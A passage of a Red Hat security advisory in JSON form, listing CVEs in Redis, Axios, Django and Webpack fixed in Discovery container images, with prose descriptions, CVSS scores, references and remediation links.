"discovery_date": "2024-10-07T20:01:19.998028+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2317056"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Redis. This flaw allows an authenticated user to use a specially crafted Lua script to trigger a stack buffer overflow in the bit library, which may lead to remote code execution. The problem exists in all versions of Redis with Lua scripting.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "redis: Lua library commands may lead to stack overflow and RCE in Redis",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-31449"
},
{
"category": "external",
"summary": "RHBZ#2317056",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2317056"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-31449",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31449"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-31449",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31449"
},
{
"category": "external",
"summary": "https://github.com/redis/redis/commit/1f7c148be2cbacf7d50aa461c58b871e87cc5ed9",
"url": "https://github.com/redis/redis/commit/1f7c148be2cbacf7d50aa461c58b871e87cc5ed9"
},
{
"category": "external",
"summary": "https://github.com/redis/redis/security/advisories/GHSA-whxg-wx83-85p5",
"url": "https://github.com/redis/redis/security/advisories/GHSA-whxg-wx83-85p5"
}
],
"release_date": "2024-10-07T19:51:08.775000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "redis: Lua library commands may lead to stack overflow and RCE in Redis"
},
{
"cve": "CVE-2024-39338",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2024-08-13T17:21:32.774718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2304369"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in the Axios HTTP Client. It is vulnerable to a server-side request forgery attack (SSRF) caused by unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. This flaw allows an attacker to perform arbitrary requests from the server, potentially accessing internal systems or exfiltrating sensitive data.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: axios: Server-Side Request Forgery",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated as IMPORTANT because it can be exploited remotely with low complexity and without user interaction, it poses a significant risk to confidentiality.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-39338"
},
{
"category": "external",
"summary": "RHBZ#2304369",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304369"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-39338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39338"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-39338",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39338"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases",
"url": "https://github.com/axios/axios/releases"
},
{
"category": "external",
"summary": "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html",
"url": "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html"
}
],
"release_date": "2024-08-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: axios: Server-Side Request Forgery"
},
{
"cve": "CVE-2024-41989",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-08-02T01:40:06+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2302433"
}
],
"notes": [
{
"category": "description",
"text": "A security issue was found in Django. If \u0027floatformat\u0027 received a string representation of a number in scientific notation with a large exponent, it could lead to significant memory consumption. To avoid this, decimals with more than 200 digits are now returned as is.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-django: Memory exhaustion in django.utils.numberformat.floatformat()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is categorized as moderate severity rather than important because, while it has the potential to cause significant memory consumption under specific conditions, the likelihood of such a scenario occurring in typical applications is relatively low. The issue arises primarily when processing extremely large numbers in scientific notation, which is not a common use case in most Django applications. Additionally, the impact is localized to the floatformat function, and the issue does not expose sensitive data or compromise the integrity of the application.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-41989"
},
{
"category": "external",
"summary": "RHBZ#2302433",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302433"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-41989",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41989"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-41989",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41989"
}
],
"release_date": "2024-08-06T13:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-django: Memory exhaustion in django.utils.numberformat.floatformat()"
},
{
"cve": "CVE-2024-41991",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-08-02T02:03:22+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2302435"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Django. \u0027urlize\u0027, \u0027urlizetrunc\u0027, and \u0027AdminURLFieldWidget\u0027 may be subject to a denial of service attack via certain inputs with a very large number of Unicode characters.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-django: Potential denial-of-service vulnerability in django.utils.html.urlize() and AdminURLFieldWidget",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The identified vulnerability in Django\u0027s urlize, urlizetrunc template filters, and the AdminURLFieldWidget widget is classified as moderate severity rather than important due to its specific attack vector and impact. While the flaw allows for a potential denial-of-service (DoS) attack via inputs with a large number of Unicode characters, exploiting this vulnerability requires a significant volume of data to be processed by these components, which is a non-trivial task. Additionally, standard mitigation measures such as input validation, rate limiting, and monitoring can effectively reduce the risk.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-41991"
},
{
"category": "external",
"summary": "RHBZ#2302435",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302435"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-41991",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41991"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-41991",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41991"
},
{
"category": "external",
"summary": "https://www.djangoproject.com/weblog/2024/aug/06/security-releases/",
"url": "https://www.djangoproject.com/weblog/2024/aug/06/security-releases/"
}
],
"release_date": "2024-08-06T13:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-django: Potential denial-of-service vulnerability in django.utils.html.urlize() and AdminURLFieldWidget"
},
{
"cve": "CVE-2024-42005",
"cwe": {
"id": "CWE-89",
"name": "Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)"
},
"discovery_date": "2024-08-02T02:08:30+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2302436"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Django. The QuerySet.values() and QuerySet.values_list() methods on models with a JSONField were subject to SQL injection in column aliases via a crafted JSON object key as a passed *arg.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-django: Potential SQL injection in QuerySet.values() and values_list()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is considered of moderate severity rather than high or critical because it requires specific conditions to be exploitable. The potential for SQL injection exists only when QuerySet.values() or values_list() methods are used on models with a JSONField, and an attacker must have control over the JSON object keys passed as arguments. In typical use cases, these methods are often used with predefined or controlled data, limiting the attack surface. Furthermore, the impact is constrained to the manipulation of column aliases, rather than direct injection into more critical parts of the SQL query, reducing the overall risk compared to more direct forms of SQL injection vulnerabilities.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-42005"
},
{
"category": "external",
"summary": "RHBZ#2302436",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302436"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-42005",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42005"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-42005",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-42005"
},
{
"category": "external",
"summary": "https://www.djangoproject.com/weblog/2024/aug/06/security-releases/",
"url": "https://www.djangoproject.com/weblog/2024/aug/06/security-releases/"
}
],
"release_date": "2024-08-06T13:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-django: Potential SQL injection in QuerySet.values() and values_list()"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
